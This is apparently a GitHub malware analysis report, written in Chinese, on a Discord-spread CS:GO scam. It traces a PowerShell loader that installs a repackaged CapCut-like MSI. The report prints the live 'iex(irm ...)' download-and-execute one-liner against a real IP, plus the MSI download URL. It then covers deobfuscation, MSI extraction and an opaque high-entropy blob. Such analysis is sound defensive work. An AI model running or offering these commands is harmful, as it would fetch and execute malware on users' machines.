MessyToilet/csgo-scam-via-powershell-5-31-2026
GitHub: MessyToilet/csgo-scam-via-powershell-5-31-2026
一份针对通过 Discord 社会工程学传播的 CS:GO 诈骗恶意软件的 PowerShell-to-MSI 投递链分析报告,涵盖完整的去混淆、MSI 提取和可疑文件逆向过程。
Stars: 1 | Forks: 0
# 可疑 PowerShell 传递的 MSI 分析报告
## 总结
本次分析始于一段可疑的 PowerShell 单行命令:
```
powershell -c "iex(irm '85.239.149.40/FnjVsLKEJb2Jall3wx' -UseBasicParsing)"
```
该命令从原始 IP 地址下载远程 PowerShell 代码,并立即使用 `Invoke-Expression` 在内存中执行。这种模式通常与 loader、dropper 和恶意软件投递链相关。
下载的脚本经过了严重的混淆。它包含许多垃圾变量和一个分割在多个变量中的大型 Base64 编码 payload。经过去混淆后,发现该脚本会解码并执行第二阶段的 PowerShell 脚本。
第二阶段脚本从以下位置下载了一个 MSI 安装包:
```
http://85.239.149.40:6600/5sxu2qr5/UICBDMW.msi
```
脚本将其保存在:
```
C:\ProgramData\Zooms\UICBDMW.msi
```
并使用 `msiexec` 静默执行了该文件。
## 报告的传播背景
据报道,该样本是通过 Discord 上的社会工程学进行传播的。涉嫌的诈骗者使用 Discord 机器人或基于 Discord 的交互来诱骗用户运行 PowerShell 命令,声称这是游玩 FACEIT / CS:GO 所必需的。
提供给受害者的初始命令是:
```
powershell -c "iex(irm '85.239.149.40/FnjVsLKEJb2Jall3wx' -UseBasicParsing)"
## 执行 Chain
The observed execution chain was:
```text
PowerShell one-liner
→ Invoke-RestMethod downloads script from raw IP
→ Invoke-Expression executes script in memory
→ Obfuscated PowerShell decodes Base64 payload
→ Hidden PowerShell process launches second-stage script
→ Second-stage script downloads MSI from raw IP on port 6600
→ MSI is executed silently
```
这种传递方式十分可疑,因为它使用了:
* 从原始 IP 地址执行远程脚本
* 严重的 PowerShell 混淆
* Base64 编码的分阶段 payload
* 隐藏的 PowerShell 执行
* 绕过执行策略
* 静默安装 MSI
## MSI 分析结果
该 MSI 文件被提取并使用 `7z` 进行了检查。它包含了 16 个嵌入式文件。其中大多数是 Windows PE 文件(主要是 DLL),外加一个 GUI 可执行文件和两个通用数据文件。
MSI 的元数据很不寻常:
```
ProductName: Sizarship
Manufacturer: Veil Patron
Install folder: LocalAppDataFolder\Teel
```
这些名称与安装包中表面上存在的 CapCut/ByteDance 组件并不匹配。
MSI 文件表将随机的内部文件名映射到了已安装的文件名,例如:
```
P0kk0eAnsGQS → EPixe20.exe
GkCaSpXcg95SIo8m → Qt6Core.dll
Y8p1Gq0n7iNF → VEConfig.dll
S3cwB5EdKcaF4u5M → VECrashMonitor.dll
t0Mhrk0VAbsv → VESafeGuard.dll
ICnGNGxT → libcrypto-1_1-x64.dll
iXzxVqBqNYNtJjOM5gz → libssl-1_1-x64.dll
viM6fon1J7MG1Wb → libcurl.dll
US8yBGmyj → tracker32.bin
Pm7KFbOWP5 → buffer-layer.tmp
```
主可执行文件似乎是:
```
EPixe20.exe
```
该 MSI 似乎还包含一个名为以下内容的自定义操作:
```
LaunchFile
```
这可能会在安装完成后启动已安装的可执行文件。
## CapCut / ByteDance 指标
几个提取出的文件包含与 CapCut 或 ByteDance 相关的字符串。主可执行文件和 DLL 引用了诸如以下的组件:
```
CapCut.exe
VEConfig.dll
VESafeGuard.dll
VECrashMonitor.dll
Qt6Core.dll
libcurl.dll
```
一些文件还包含与 CapCut 相关的 API endpoint 和与 ByteDance 相关的字符串。从至少两个 PE 文件中提取的证书数据显示了 ByteDance 代码签名证书链。
这表明该 MSI 可能包含真实的 CapCut/ByteDance 组件,或者是从不合法的 CapCut 安装中复制的组件。
然而,可疑的传递链、伪造的 MSI 元数据、被重命名的可执行文件以及不寻常的安装路径表明,这很可能是一个被重新打包或伪造的安装包,而不是正常的 CapCut 安装包。
## `tracker32.bin` 分析
最令人感兴趣的文件之一是:
```
US8yBGmyj → tracker32.bin
```
该文件具有高熵值:
```
tracker32.bin size: 2,279,810 bytes
entropy: 7.913
```
初始文件分析将其识别为通用数据。它似乎不是正常的可执行文件、ZIP 归档、gzip 文件、7z 归档、SQLite 数据库或正常的 PNG 图像。
进一步的检查发现了许多 PNG 样式的 chunk 标记:
```
IDAT
IEND
```
该文件包含重复的 `IDAT` chunk,并以看起来有效的 `IEND` 标记结束。手动解析显示:
```
277 chunks
IDAT chunks mostly 8192 bytes
IEND chunk at the end
0 bad CRCs
```
这意味着该文件使用了有效的 PNG 样式 chunk 框架:
```
[length][IDAT][data][CRC]
[length][IDAT][data][CRC]
...
[IEND]
```
然而,合并后的 IDAT 数据未能通过正常的 PNG/zlib 解压:
```
zlib: incorrect header check
raw deflate: invalid block type
gzip: not a gzipped file
bz2: invalid data stream
lzma/xz: unsupported input
```
这表明 `tracker32.bin` 并不是一个有效的 PNG 图像,尽管它使用了类似 PNG 的 chunk 结构。
最可能的解释是:
1. 一个使用 PNG 样式 chunk 的自定义资源容器
2. 一个加密或打包的资源 blob
3. 一个非标准的应用程序数据文件
4. 捆绑应用程序使用的诱饵或混淆资产
在这个阶段,虽然尚未证明 `tracker32.bin` 是可执行的恶意软件,但由于其具有高熵值、非标准性且经过了蓄意结构化,因此仍然十分可疑。
## 当前评估
根据目前收集到的证据,应将该样本视为可疑或恶意样本。
最强烈的可疑指标包括:
* 从原始 IP 执行远程 PowerShell
* 经过混淆的 Base64 PowerShell loader
* 隐藏的 PowerShell 执行
* 绕过执行策略
* 从非标准端口的原始 IP 下载 MSI
* 静默执行 MSI
* 看起来伪造的 MSI 产品和制造商元数据
* 安装到奇怪的 LocalAppData 文件夹中
* 主可执行文件被重命名为 `EPixe20.exe`
* 在伪造的安装程序品牌下捆绑 CapCut/ByteDance 组件
* 存在一个名为 `tracker32.bin` 且不透明、具有高熵值的文件
目前的分析尚未证明其存在账户盗窃、Steam 盗窃、Gmail 盗窃或浏览器凭据盗窃的行为。在目前完成的步骤中,尚未确认存在用于 Steam、Gmail、浏览器 cookie 盗窃、Discord token 盗窃或密码窃取的明确静态字符串。
当前最佳的分类是:
```
Suspicious PowerShell-delivered fake/repackaged CapCut-like MSI installer.
Likely unwanted or malicious delivery chain.
Contains signed CapCut/ByteDance-looking components and an opaque high-entropy resource blob.
No confirmed credential-stealing behavior yet from static analysis performed so far.
```
## 建议提交至 VirusTotal 的集合
以下文件值得单独提交:
```
Original PowerShell script
decoded.ps1
UICBDMW.msi
EPixe20.exe / P0kk0eAnsGQS
Qt6Core.dll / GkCaSpXcg95SIo8m
VEConfig.dll / Y8p1Gq0n7iNF
tracker32.bin / US8yBGmyj
tracker32_idat_payload.bin
buffer-layer.tmp / Pm7KFbOWP5
```
建议的 VirusTotal 评论:
```
Suspicious PowerShell-delivered MSI. Initial command uses IEX/IRM from raw IP 85.239.149.40. Obfuscated PowerShell decodes a second stage, launches hidden PowerShell with execution policy bypass, downloads UICBDMW.msi from 85.239.149.40:6600, and silently installs it. MSI metadata uses fake-looking ProductName “Sizarship” and Manufacturer “Veil Patron”, installs to LocalAppDataFolder\Teel, and launches EPixe20.exe. Extracted files include signed CapCut/ByteDance-looking components plus opaque high-entropy tracker32.bin using valid PNG-style IDAT/IEND chunks with non-zlib data.
```
## 结论
应将该样本视为恶意或高度可疑的样本。
技术证据证实了可疑的分阶段 PowerShell 到 MSI 传递链。据报道的传播方式——在游玩 FACEIT / CS:GO 的借口下进行的 Discord 社会工程学——进一步印证了其恶意意图。
一份已确认的受害者报告声称,在执行后发生了 Gmail 被访问和 Steam 账户被临时接管的情况。然而,到目前为止执行的分析尚未确定确切的凭据盗窃机制。需要进一步的行为分析,以证明该样本是否会窃取浏览器 cookie、Steam 会话文件、Gmail/Google token 或凭据。
标签:AI合规, DAST, DNS 反向解析, IPv6, Libemu, OpenCanary, PowerShell, 云资产清单, 威胁情报, 安全研究报告, 开发者工具, 恶意软件分析, 网络信息收集, 逆向工程